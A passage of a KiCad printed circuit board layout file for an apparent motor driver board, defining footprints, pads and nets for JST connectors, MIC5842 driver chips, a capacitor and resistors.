*.Cu *.Mask F.SilkS) (net 1 GND)) ) (module JST_XH_Connectors:JST_XH_2-5mm_5pin (layer F.Cu) (tedit 5B709D6C) (tstamp 565C03AD) (at 97.028 22.86) (path /59D1964C) (fp_text reference P4 (at 6.096 2.794) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value CONN_01X05 (at 0 -3) (layer F.Fab) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -7.45 3.4) (end -7.45 -2.35) (layer F.SilkS) (width 0.15)) (fp_line (start 7.45 3.4) (end -7.45 3.4) (layer F.SilkS) (width 0.15)) (fp_line (start 7.45 -2.35) (end 7.45 3.4) (layer F.SilkS) (width 0.15)) (fp_line (start -7.45 -2.35) (end 7.45 -2.35) (layer F.SilkS) (width 0.15)) (fp_line (start -7.45 -1) (end -6 -1) (layer F.SilkS) (width 0.15)) (fp_line (start 7.45 -1) (end 6 -1) (layer F.SilkS) (width 0.15)) (pad 1 thru_hole circle (at -5 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 9 "Net-(P4-Pad1)")) (pad 2 thru_hole circle (at -2.5 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 10 "Net-(P4-Pad2)")) (pad 3 thru_hole circle (at 0 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 11 "Net-(P4-Pad3)")) (pad 4 thru_hole circle (at 2.5 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 12 "Net-(P4-Pad4)")) (pad 5 thru_hole circle (at 5 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 45 +12V)) ) (module JST_XH_Connectors:JST_XH_2-5mm_5pin (layer F.Cu) (tedit 5B709D6A) (tstamp 565C039E) (at 81.788 22.86) (path /59D19653) (fp_text reference P3 (at 6.096 2.794) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value CONN_01X05 (at 0 -3) (layer F.Fab) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -7.45 3.4) (end -7.45 -2.35) (layer F.SilkS) (width 0.15)) (fp_line (start 7.45 3.4) (end -7.45 3.4) (layer F.SilkS) (width 0.15)) (fp_line (start 7.45 -2.35) (end 7.45 3.4) (layer F.SilkS) (width 0.15)) (fp_line (start -7.45 -2.35) (end 7.45 -2.35) (layer F.SilkS) (width 0.15)) (fp_line (start -7.45 -1) (end -6 -1) (layer F.SilkS) (width 0.15)) (fp_line (start 7.45 -1) (end 6 -1) (layer F.SilkS) (width 0.15)) (pad 1 thru_hole circle (at -5 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 5 "Net-(P3-Pad1)")) (pad 2 thru_hole circle (at -2.5 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 6 "Net-(P3-Pad2)")) (pad 3 thru_hole circle (at 0 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 7 "Net-(P3-Pad3)")) (pad 4 thru_hole circle (at 2.5 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 8 "Net-(P3-Pad4)")) (pad 5 thru_hole circle (at 5 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 45 +12V)) ) (module JST_XH_Connectors:JST_XH_2-5mm_5pin (layer F.Cu) (tedit 5B709D7A) (tstamp 59D9B3ED) (at 51.308 22.86) (path /5649AA03) (fp_text reference P1 (at 6.096 2.794) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value CONN_01X05 (at 0 -3) (layer F.Fab) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -7.45 3.4) (end -7.45 -2.35) (layer F.SilkS) (width 0.15)) (fp_line (start 7.45 3.4) (end -7.45 3.4) (layer F.SilkS) (width 0.15)) (fp_line (start 7.45 -2.35) (end 7.45 3.4) (layer F.SilkS) (width 0.15)) (fp_line (start -7.45 -2.35) (end 7.45 -2.35) (layer F.SilkS) (width 0.15)) (fp_line (start -7.45 -1) (end -6 -1) (layer F.SilkS) (width 0.15)) (fp_line (start 7.45 -1) (end 6 -1) (layer F.SilkS) (width 0.15)) (pad 1 thru_hole circle (at -5 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 29 "Net-(P1-Pad1)")) (pad 2 thru_hole circle (at -2.5 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 14 "Net-(P1-Pad2)")) (pad 3 thru_hole circle (at 0 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 13 "Net-(P1-Pad3)")) (pad 4 thru_hole circle (at 2.5 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 16 "Net-(P1-Pad4)")) (pad 5 thru_hole circle (at 5 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 45 +12V)) ) (module JST_XH_Connectors:JST_XH_2-5mm_5pin (layer F.Cu) (tedit 5B709D60) (tstamp 59D9B3F5) (at 66.548 22.86) (path /5641B40C) (fp_text reference P2 (at 6.096 2.794) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value CONN_01X05 (at 0 -3) (layer F.Fab) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -7.45 3.4) (end -7.45 -2.35) (layer F.SilkS) (width 0.15)) (fp_line (start 7.45 3.4) (end -7.45 3.4) (layer F.SilkS) (width 0.15)) (fp_line (start 7.45 -2.35) (end 7.45 3.4) (layer F.SilkS) (width 0.15)) (fp_line (start -7.45 -2.35) (end 7.45 -2.35) (layer F.SilkS) (width 0.15)) (fp_line (start -7.45 -1) (end -6 -1) (layer F.SilkS) (width 0.15)) (fp_line (start 7.45 -1) (end 6 -1) (layer F.SilkS) (width 0.15)) (pad 1 thru_hole circle (at -5 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 2 "Net-(P2-Pad1)")) (pad 2 thru_hole circle (at -2.5 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 3 "Net-(P2-Pad2)")) (pad 3 thru_hole circle (at 0 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 4 "Net-(P2-Pad3)")) (pad 4 thru_hole circle (at 2.5 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 30 "Net-(P2-Pad4)")) (pad 5 thru_hole circle (at 5 0) (size 1.524 1.524) (drill 0.95) (layers *.Cu *.Mask F.SilkS) (net 45 +12V)) ) (module PinHeaders:Pin_Header_Straight_1x04 (layer F.Cu) (tedit 59DEFC39) (tstamp 59D9B403) (at 81.788 61.214 90) (descr "Through hole pin header") (tags "pin header") (path /56634E4B) (fp_text reference P6 (at 1.524 -2.032 90) (layer F.SilkS) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value CONN_01X04 (at 0 -3.1 90) (layer F.Fab) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -1.2 -1.2) (end 1.2 -1.2) (layer F.SilkS) (width 0.15)) (fp_line (start 1.2 -1.2) (end 1.2 8.82) (layer F.SilkS) (width 0.15)) (fp_line (start -1.2 -1.2) (end -1.2 8.82) (layer F.SilkS) (width 0.15)) (fp_line (start -1.2 8.82) (end 1.2 8.82) (layer F.SilkS) (width 0.15)) (pad 1 thru_hole rect (at 0 0 90) (size 1.75 1.75) (drill 1) (layers *.Cu *.Mask F.SilkS) (net 31 /SENSE1)) (pad 2 thru_hole oval (at 0 2.54 90) (size 1.75 1.75) (drill 1) (layers *.Cu *.Mask F.SilkS) (net 32 /SENSE2)) (pad 3 thru_hole oval (at 0 5.08 90) (size 1.75 1.75) (drill 1) (layers *.Cu *.Mask F.SilkS) (net 33 /SENSE3)) (pad 4 thru_hole oval (at 0 7.62 90) (size 1.75 1.75) (drill 1) (layers *.Cu *.Mask F.SilkS) (net 34 /SENSE4)) (model Pin_Headers.3dshapes/Pin_Header_Straight_1x04.wrl (offset (xyz 0 -3.809999942779541 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 90)) ) ) (module Housings_DIP:DIP-18_W7.62mm (layer F.Cu) (tedit 5B970C48) (tstamp 59D9B438) (at 46.99 37.592 90) (descr "18-lead though-hole mounted DIP package, row spacing 7.62 mm (300 mils)") (tags "THT DIP DIL PDIP 2.54mm 7.62mm 300mil") (path /59D00F46) (fp_text reference U2 (at 5.207 0 180) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value MIC5842 (at 5.334 9.652 180) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 8.7 -1.55) (end -1.1 -1.55) (layer F.CrtYd) (width 0.05)) (fp_line (start 8.7 21.85) (end 8.7 -1.55) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.1 21.85) (end 8.7 21.85) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.1 -1.55) (end -1.1 21.85) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.46 -1.33) (end 4.81 -1.33) (layer F.SilkS) (width 0.12)) (fp_line (start 6.46 21.65) (end 6.46 -1.33) (layer F.SilkS) (width 0.12)) (fp_line (start 1.16 21.65) (end 6.46 21.65) (layer F.SilkS) (width 0.12)) (fp_line (start 1.16 -1.33) (end 1.16 21.65) (layer F.SilkS) (width 0.12)) (fp_line (start 2.81 -1.33) (end 1.16 -1.33) (layer F.SilkS) (width 0.12)) (fp_line (start 0.635 -0.27) (end 1.635 -1.27) (layer F.Fab) (width 0.1)) (fp_line (start 0.635 21.59) (end 0.635 -0.27) (layer F.Fab) (width 0.1)) (fp_line (start 6.985 21.59) (end 0.635 21.59) (layer F.Fab) (width 0.1)) (fp_line (start 6.985 -1.27) (end 6.985 21.59) (layer F.Fab) (width 0.1)) (fp_line (start 1.635 -1.27) (end 6.985 -1.27) (layer F.Fab) (width 0.1)) (fp_arc (start 3.81 -1.33) (end 2.81 -1.33) (angle -180) (layer F.SilkS) (width 0.12)) (fp_text user %R (at 3.81 10.16 90) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (pad 1 thru_hole rect (at 0 0 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 1 GND)) (pad 10 thru_hole oval (at 7.62 20.32 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 45 +12V)) (pad 2 thru_hole oval (at 0 2.54 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 24 /SPI_CLOCK)) (pad 11 thru_hole oval (at 7.62 17.78 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 30 "Net-(P2-Pad4)")) (pad 3 thru_hole oval (at 0 5.08 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 20 /MOTOR_DATA_IN)) (pad 12 thru_hole oval (at 7.62 15.24 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 4 "Net-(P2-Pad3)")) (pad 4 thru_hole oval (at 0 7.62 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 1 GND)) (pad 13 thru_hole oval (at 7.62 12.7 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 3 "Net-(P2-Pad2)")) (pad 5 thru_hole oval (at 0 10.16 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 15 +5V)) (pad 14 thru_hole oval (at 7.62 10.16 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 2 "Net-(P2-Pad1)")) (pad 6 thru_hole oval (at 0 12.7 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 35 "Net-(U2-Pad6)")) (pad 15 thru_hole oval (at 7.62 7.62 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 16 "Net-(P1-Pad4)")) (pad 7 thru_hole oval (at 0 15.24 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 21 /MOTOR_LATCH)) (pad 16 thru_hole oval (at 7.62 5.08 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 13 "Net-(P1-Pad3)")) (pad 8 thru_hole oval (at 0 17.78 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 1 GND)) (pad 17 thru_hole oval (at 7.62 2.54 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 14 "Net-(P1-Pad2)")) (pad 9 thru_hole oval (at 0 20.32 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 1 GND)) (pad 18 thru_hole oval (at 7.62 0 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 29 "Net-(P1-Pad1)")) (model ${KISYS3DMOD}/Housings_DIP.3dshapes/DIP-18_W7.62mm.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module Housings_DIP:DIP-18_W7.62mm (layer F.Cu) (tedit 5B92F229) (tstamp 59D9B44D) (at 76.708 37.592 90) (descr "18-lead though-hole mounted DIP package, row spacing 7.62 mm (300 mils)") (tags "THT DIP DIL PDIP 2.54mm 7.62mm 300mil") (path /59D01981) (fp_text reference U4 (at 5.207 0.127 180) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value MIC5842 (at 5.588 9.398 180) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 8.7 -1.55) (end -1.1 -1.55) (layer F.CrtYd) (width 0.05)) (fp_line (start 8.7 21.85) (end 8.7 -1.55) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.1 21.85) (end 8.7 21.85) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.1 -1.55) (end -1.1 21.85) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.46 -1.33) (end 4.81 -1.33) (layer F.SilkS) (width 0.12)) (fp_line (start 6.46 21.65) (end 6.46 -1.33) (layer F.SilkS) (width 0.12)) (fp_line (start 1.16 21.65) (end 6.46 21.65) (layer F.SilkS) (width 0.12)) (fp_line (start 1.16 -1.33) (end 1.16 21.65) (layer F.SilkS) (width 0.12)) (fp_line (start 2.81 -1.33) (end 1.16 -1.33) (layer F.SilkS) (width 0.12)) (fp_line (start 0.635 -0.27) (end 1.635 -1.27) (layer F.Fab) (width 0.1)) (fp_line (start 0.635 21.59) (end 0.635 -0.27) (layer F.Fab) (width 0.1)) (fp_line (start 6.985 21.59) (end 0.635 21.59) (layer F.Fab) (width 0.1)) (fp_line (start 6.985 -1.27) (end 6.985 21.59) (layer F.Fab) (width 0.1)) (fp_line (start 1.635 -1.27) (end 6.985 -1.27) (layer F.Fab) (width 0.1)) (fp_arc (start 3.81 -1.33) (end 2.81 -1.33) (angle -180) (layer F.SilkS) (width 0.12)) (fp_text user %R (at 3.81 10.16 90) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (pad 1 thru_hole rect (at 0 0 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 1 GND)) (pad 10 thru_hole oval (at 7.62 20.32 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 45 +12V)) (pad 2 thru_hole oval (at 0 2.54 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 24 /SPI_CLOCK)) (pad 11 thru_hole oval (at 7.62 17.78 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 12 "Net-(P4-Pad4)")) (pad 3 thru_hole oval (at 0 5.08 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 35 "Net-(U2-Pad6)")) (pad 12 thru_hole oval (at 7.62 15.24 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 11 "Net-(P4-Pad3)")) (pad 4 thru_hole oval (at 0 7.62 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 1 GND)) (pad 13 thru_hole oval (at 7.62 12.7 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 10 "Net-(P4-Pad2)")) (pad 5 thru_hole oval (at 0 10.16 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 15 +5V)) (pad 14 thru_hole oval (at 7.62 10.16 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 9 "Net-(P4-Pad1)")) (pad 6 thru_hole oval (at 0 12.7 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 26 /MOTOR_DATA_OUT)) (pad 15 thru_hole oval (at 7.62 7.62 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 8 "Net-(P3-Pad4)")) (pad 7 thru_hole oval (at 0 15.24 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 21 /MOTOR_LATCH)) (pad 16 thru_hole oval (at 7.62 5.08 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 7 "Net-(P3-Pad3)")) (pad 8 thru_hole oval (at 0 17.78 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 1 GND)) (pad 17 thru_hole oval (at 7.62 2.54 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 6 "Net-(P3-Pad2)")) (pad 9 thru_hole oval (at 0 20.32 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 1 GND)) (pad 18 thru_hole oval (at 7.62 0 90) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 5 "Net-(P3-Pad1)")) (model ${KISYS3DMOD}/Housings_DIP.3dshapes/DIP-18_W7.62mm.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module Capacitors_ThroughHole:C_Rect_L7.0mm_W2.5mm_P5.00mm (layer F.Cu) (tedit 5B92F1D3) (tstamp 59DB0965) (at 54.61 40.64 180) (descr "C, Rect series, Radial, pin pitch=5.00mm, , length*width=7*2.5mm^2, Capacitor") (tags "C Rect series Radial pin pitch 5.00mm length 7mm width 2.5mm Capacitor") (path /59D7A147) (fp_text reference C2 (at 5.08 -2.286 180) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 0.1uF (at 0.762 -2.286 180) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 6.35 -1.6) (end -1.35 -1.6) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.35 1.6) (end 6.35 -1.6) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.35 1.6) (end 6.35 1.6) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.35 -1.6) (end -1.35 1.6) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.06 -1.31) (end 6.06 1.31) (layer F.SilkS) (width 0.12)) (fp_line (start -1.06 -1.31) (end -1.06 1.31) (layer F.SilkS) (width 0.12)) (fp_line (start -1.06 1.31) (end 6.06 1.31) (layer F.SilkS) (width 0.12)) (fp_line (start -1.06 -1.31) (end 6.06 -1.31) (layer F.SilkS) (width 0.12)) (fp_line (start 6 -1.25) (end -1 -1.25) (layer F.Fab) (width 0.1)) (fp_line (start 6 1.25) (end 6 -1.25) (layer F.Fab) (width 0.1)) (fp_line (start -1 1.25) (end 6 1.25) (layer F.Fab) (width 0.1)) (fp_line (start -1 -1.25) (end -1 1.25) (layer F.Fab) (width 0.1)) (fp_text user %R (at 0.254 0.508 180) (layer F.Fab) hide (effects (font (size 1 1) (thickness 0.15))) ) (pad 1 thru_hole circle (at 0 0 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 15 +5V)) (pad 2 thru_hole circle (at 5 0 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 1 GND)) (model ${KISYS3DMOD}/Capacitors_THT.3dshapes/C_Rect_L7.0mm_W2.5mm_P5.00mm.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module Resistors_ThroughHole:R_Axial_DIN0204_L3.6mm_D1.6mm_P7.62mm_Horizontal (layer F.Cu) (tedit 59E42AE2) (tstamp 59E0557A) (at 89.408 51.054 270) (descr "Resistor, Axial_DIN0204 series, Axial, Horizontal, pin pitch=7.62mm, 0.16666666666666666W = 1/6W, length*diameter=3.6*1.6mm^2, http://cdn-reichelt.de/documents/datenblatt/B400/1_4W%23YAG.pdf") (tags "Resistor Axial_DIN0204 series Axial Horizontal pin pitch 7.62mm 0.16666666666666666W = 1/6W length 3.6mm diameter 1.6mm") (path /59D1CDB9) (fp_text reference R3 (at 4.064 9.906) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 47k (at 3.81 0 270) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 8.6 -1.15) (end -0.95 -1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start 8.6 1.15) (end 8.6 -1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.95 1.15) (end 8.6 1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.95 -1.15) (end -0.95 1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.74 0) (end 5.67 0) (layer F.SilkS) (width 0.12)) (fp_line (start 0.88 0) (end 1.95 0) (layer F.SilkS) (width 0.12)) (fp_line (start 5.67 -0.86) (end 1.95 -0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 5.67 0.86) (end 5.67 -0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 0.86) (end 5.67 0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 -0.86) (end 1.95 0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 7.62 0) (end 5.61 0) (layer F.Fab) (width 0.1)) (fp_line (start 0 0) (end 2.01 0) (layer F.Fab) (width 0.1)) (fp_line (start 5.61 -0.8) (end 2.01 -0.8) (layer F.Fab) (width 0.1)) (fp_line (start 5.61 0.8) (end 5.61 -0.8) (layer F.Fab) (width 0.1)) (fp_line (start 2.01 0.8) (end 5.61 0.8) (layer F.Fab) (width 0.1)) (fp_line (start 2.01 -0.8) (end 2.01 0.8) (layer F.Fab) (width 0.1)) (pad 1 thru_hole circle (at 0 0 270) (size 1.4 1.4) (drill 0.7) (layers *.Cu *.Mask) (net 15 +5V)) (pad 2 thru_hole oval (at 7.62 0 270) (size 1.4 1.4) (drill 0.7) (layers *.Cu *.Mask) (net 34 /SENSE4)) (model ${KISYS3DMOD}/Resistors_THT.3dshapes/R_Axial_DIN0204_L3.6mm_D1.6mm_P7.62mm_Horizontal.wrl (at (xyz 0 0 0)) (scale (xyz 0.393701 0.393701 0.393701)) (rotate (xyz 0 0 0)) ) ) (module Resistors_ThroughHole:R_Axial_DIN0204_L3.6mm_D1.6mm_P7.62mm_Horizontal (layer F.Cu) (tedit 59E42ADE) (tstamp 59E0558F) (at 86.868 51.054 270) (descr "Resistor, Axial_DIN0204 series, Axial, Horizontal, pin pitch=7.62mm, 0.16666666666666666W = 1/6W, length*diameter=3.6*1.6mm^2, http://cdn-reichelt.de/documents/datenblatt/B400/1_4W%23YAG.pdf") (tags "Resistor Axial_DIN0204 series Axial Horizontal pin pitch 7.62mm 0.16666666666666666W = 1/6W length 3.6mm diameter 1.6mm") (path /59D1CD54) (fp_text reference R4 (at 2.794 7.366) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 47k (at 3.81 0 270) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 8.6 -1.15) (end -0.95 -1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start 8.6 1.15) (end 8.6 -1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.95 1.15) (end 8.6 1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.95 -1.15) (end -0.95 1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.74 0) (end 5.67 0) (layer F.SilkS) (width 0.12)) (fp_line (start 0.88 0) (end 1.95 0) (layer F.SilkS) (width 0.12)) (fp_line (start 5.67 -0.86) (end 1.95 -0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 5.67 0.86) (end 5.67 -0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 0.86) (end 5.67 0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 -0.86) (end 1.95 0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 7.62 0) (end 5.61 0) (layer F.Fab) (width 0.1)) (fp_line (start 0 0) (end 2.01 0) (layer F.Fab) (width 0.1)) (fp_line (start 5.61 -0.8) (end 2.01 -0.8) (layer F.Fab) (width 0.1)) (fp_line (start 5.61 0.8) (end 5.61 -0.8) (layer F.Fab) (width 0.1)) (fp_line (start 2.01 0.8) (end 5.61 0.8) (layer F.Fab) (width 0.1)) (fp_line (start 2.01 -0.8) (end 2.01 0.8) (layer F.Fab) (width 0.1)) (pad 1 thru_hole circle (at 0 0 270) (size 1.4 1.4) (drill 0.7) (layers *.Cu *.Mask) (net 15 +5V)) (pad 2 thru_hole oval (at 7.62 0 270) (size 1.4 1.4) (drill 0.7) (layers *.Cu *.Mask) (net 33 /SENSE3)) (model ${KISYS3DMOD}/Resistors_THT.3dshapes/R_Axial_DIN0204_L3.6mm_D1.6mm_P7.62mm_Horizontal.wrl (at (xyz 0 0 0)) (scale (xyz 0.393701 0.393701 0.393701)) (rotate (xyz 0 0 0)) ) ) (module Resistors_ThroughHole:R_Axial_DIN0204_L3.6mm_D1.6mm_P7.62mm_Horizontal (layer F.Cu) (tedit 59E42ADB) (tstamp 59E055A4) (at 84.328 51.054 270) (descr "Resistor, Axial_DIN0204 series, Axial, Horizontal, pin pitch=7.62mm, 0.16666666666666666W = 1/6W, length*diameter=3.6*1.6mm^2, http://cdn-reichelt.de/documents/datenblatt/B400/1_4W%23YAG.pdf") (tags "Resistor Axial_DIN0204 series Axial Horizontal pin pitch 7.62mm 0.16666666666666666W = 1/6W length 3.6mm diameter 1.6mm") (path /59D1CCF2) (fp_text reference R5 (at 1.524 4.826) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 47k (at 3.81 0 270) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 8.6 -1.15) (end -0.95 -1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start 8.6 1.15) (end 8.6 -1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.95 1.15) (end 8.6 1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.95 -1.15) (end -0.95 1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.74 0) (end 5.67 0) (layer F.SilkS) (width 0.12)) (fp_line (start 0.88 0) (end 1.95 0) (layer F.SilkS) (width 0.12)) (fp_line (start 5.67 -0.86) (end 1.95 -0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 5.67 0.86) (end 5.67 -0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 0.86) (end 5.67 0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 -0.86) (end 1.95 0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 7.62 0) (end 5.61 0) (layer F.Fab) (width 0.1)) (fp_line (start 0 0) (end 2.01 0) (layer F.Fab) (width 0.1)) (fp_line (start 5.61 -0.8) (end 2.01 -0.8) (layer F.Fab) (width 0.1)) (fp_line (start 5.61 0.8) (end 5.61 -0.8) (layer F.Fab) (width 0.1)) (fp_line (start 2.01 0.8) (end 5.61 0.8) (layer F.Fab) (width 0.1)) (fp_line (start 2.01 -0.8) (end 2.01 0.8) (layer F.Fab) (width 0.1)) (pad 1 thru_hole circle (at 0 0 270) (size 1.4 1.4) (drill 0.7) (layers *.Cu *.Mask) (net 15 +5V)) (pad 2 thru_hole oval (at 7.62 0 270) (size 1.4 1.4) (drill 0.7) (layers *.Cu *.Mask) (net 32 /SENSE2)) (model ${KISYS3DMOD}/Resistors_THT.3dshapes/R_Axial_DIN0204_L3.6mm_D1.6mm_P7.62mm_Horizontal.wrl (at (xyz 0 0 0)) (scale (xyz 0.393701 0.393701 0.393701)) (rotate (xyz 0 0 0)) ) ) (module Resistors_ThroughHole:R_Axial_DIN0204_L3.6mm_D1.6mm_P7.62mm_Horizontal (layer F.Cu) (tedit 59E42AD7) (tstamp 59E055B9) (at 81.788 51.054 270) (descr "Resistor, Axial_DIN0204 series, Axial, Horizontal, pin pitch=7.62mm, 0.16666666666666666W = 1/6W, length*diameter=3.6*1.6mm^2, http://cdn-reichelt.de/documents/datenblatt/B400/1_4W%23YAG.pdf") (tags "Resistor Axial_DIN0204 series Axial Horizontal pin pitch 7.62mm 0.16666666666666666W = 1/6W length 3.6mm diameter 1.6mm") (path /59D1C78C) (fp_text reference R6 (at 0.254 2.286) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 47k (at 3.81 0 270) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 8.6 -1.15) (end -0.95 -1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start 8.6 1.15) (end 8.6 -1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.95 1.15) (end 8.6 1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.95 -1.15) (end -0.95 1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.74 0) (end 5.67 0) (layer 